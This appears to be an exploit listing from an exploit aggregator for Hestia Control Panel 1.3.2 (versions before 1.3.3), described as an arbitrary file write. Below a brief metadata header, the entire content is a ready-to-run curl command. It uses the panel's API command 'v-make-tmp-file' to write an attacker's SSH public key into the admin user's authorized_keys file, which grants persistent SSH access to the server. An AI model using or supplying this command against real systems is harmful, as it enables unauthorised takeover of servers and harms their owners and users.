Exploit for Hestia Control Panel 1.3.2 Arbitrary File Write

Name: Exploit for Hestia Control Panel 1.3.2 Arbitrary File Write
Rating: 5 (183 reviews)

2021-03-18 | CVSS 0.9

## https://sploitus.com/exploit?id=PACKETSTORM:161856
# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write  
# Date: 07.03.2021  
# Author: Numan Türle  
# Vendor Homepage: https://hestiacp.com/  
# Software Link: https://github.com/hestiacp/hestiacp  
# Version: < 1.3.3  
# Tested on: HestiaCP Version 1.3.2  
  
curl --location --request POST 'https://TARGET:8083/api/index.php' \  
--form 'hash="HERE_API_KEY"' \  
--form 'returncode="yes"' \  
--form 'cmd="v-make-tmp-file"' \  
--form 'arg1="ssh-rsa HERE_KEY"' \  
--form 'arg2="/home/admin/.ssh/authorized_keys"' \  
--form 'arg3=""' \  
--form 'arg4=""' \  
--form 'arg5=""'